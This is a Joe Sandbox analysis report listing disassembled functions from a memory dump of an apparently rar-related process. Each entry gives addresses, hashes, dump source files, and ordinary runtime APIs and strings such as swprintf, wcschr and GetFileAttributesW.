                                                                                                                                                                                                                                        • Instruction ID: 84ede4716b8cb6ded8cb4cb0c9bc224d836621c095a71310241ff7a8fdab1a11
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E21D076A19241DAE761CF69E480A9D77F0FB48798F544076EE48D3B48DB39E842CF10
                                                                                                                                                                                                                                        Function 00007FF6AA1E24D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                        • Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                                                                                        • Instruction ID: f0d4784c3b9676ad91997fdf7ca3f89ec950e939eadb2e6ae03f2e5ead2fdece
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9F04461B1A682E1EE968B11F46027D2360EF88B80F44107BE94F86664EE3CDC468700
                                                                                                                                                                                                                                        Function 00007FF6AA1EC654 Relevance: 7.8, APIs: 5, Instructions: 265COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                                                                                        • Instruction ID: 8d45e759207c4a1e0bb92b7e7f43b7f08571aec258f24e92c25bda9d32523b14
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59A1E962F0A782E5EB738B5088103B96692AF46BA4F484677D95D86BC5DF3CDC478380
                                                                                                                                                                                                                                        Function 00007FF6AA1E7AB4 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                                                                                        • Instruction ID: 5fbf977b409360d94581588d6e2cc646893028589291e8df916bced0af8856fa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3081C122F1A652E9F7329B6588806BD66E4BB46B84F0441B7DD0E93B95DF3CA847C310
                                                                                                                                                                                                                                        Function 00007FF6AA1E7428 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3659116390-0
                                                                                                                                                                                                                                        • Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                                                                                        • Instruction ID: 8518796b86bf7aa4392142c46b2af54d75a2568eb16a8bb4153205a2c85fe361
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9651B032A15A51DAF722CF25D4443BC3BB0BB49B98F048176DE4A87B98DF38D946C700
                                                                                                                                                                                                                                        Function 00007FF6AA1980C0 Relevance: 7.6, APIs: 5, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CharHandleWrite$ByteConsoleFileMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 643171463-0
                                                                                                                                                                                                                                        • Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                                                                                        • Instruction ID: 23709357a30434aec5561181231692e26601c191468809aed8013947561cb52c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C641F561E0A642E2F9229B20A9102BD63A4EF45BA0F04037BED6D977D5DF3CAD47C340
                                                                                                                                                                                                                                        Function 00007FF6AA1E69B4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 190572456-0
                                                                                                                                                                                                                                        • Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                                                                                        • Instruction ID: bc79df88e1aebe242a49c27421aebcd2cee7b599549ef54e51bf3e8d5dd40a62
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E41F431B0B602E1FE668B01A900575A6A1BF45BD0F9D8577DD2ECBB84EE3CEC129300
                                                                                                                                                                                                                                        Function 00007FF6AA1EDC20 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                                        • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                                        • Instruction ID: 9ede3cf05966c6f62804b1c275c36d8c25df8b01223b147e8cd2276492604d22
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A811C436E19603B5F67A1124E48677911416F47BF0E084ABFE97EC7ED6CEACBC424205
                                                                                                                                                                                                                                        Function 00007FF6AA197514 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 189COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: wcschr$BeepMessage
                                                                                                                                                                                                                                        • String ID: ($[%c]%ls
                                                                                                                                                                                                                                        • API String ID: 1408639281-228076469
                                                                                                                                                                                                                                        • Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                                                                                        • Instruction ID: 1dae2a7cc93c51b3ba0be52bcd701d22a83c181f7a81cf0e8531d93e915e7560
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6081E632A0A681D6EA66CF05E5402BA67A5FF84B88F440577EA4E97755EF3CE902C700
                                                                                                                                                                                                                                        Function 00007FF6AA1A6FE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: swprintf
                                                                                                                                                                                                                                        • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                                                                                                                                                                                                        • API String ID: 233258989-622958660
                                                                                                                                                                                                                                        • Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                                        • Instruction ID: 97db14390a5f450664d433cbf8a9e9120500d8dbd859c44bdf76bdfd5c5f3337
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51517BF3F382449AE3158F1CE841BA92691F364B90F545A2AF94AD3B44DA3DDF058700
                                                                                                                                                                                                                                        Function 00007FF6AA196E84 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: wcschr
                                                                                                                                                                                                                                        • String ID: MCAOmcao$MCAOmcao
                                                                                                                                                                                                                                        • API String ID: 1497570035-1725859250
                                                                                                                                                                                                                                        • Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                                        • Instruction ID: 51b4439e22b2a4732e85f77742302db6cf45b94f0d5bd67a207c9b90f59743a8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B641B012D0E583E0EA239F21526157E9391AF11B84F9844B7EA6DCA2D5EE2DFC53C331
                                                                                                                                                                                                                                        Function 00007FF6AA1A3528 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00007FF6AA1A359E
                                                                                                                                                                                                                                        • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6AA1A35E6
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A30C8: GetFileAttributesW.KERNELBASE(00000800,00007FF6AA1A305D,?,?,?,?,?,?,?,?,00007FF6AA1B4126,?,?,?,?,00000800), ref: 00007FF6AA1A30F0
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A30C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6AA1B4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6AA1A3119
                                                                                                                                                                                                                                        • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6AA1A3651
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
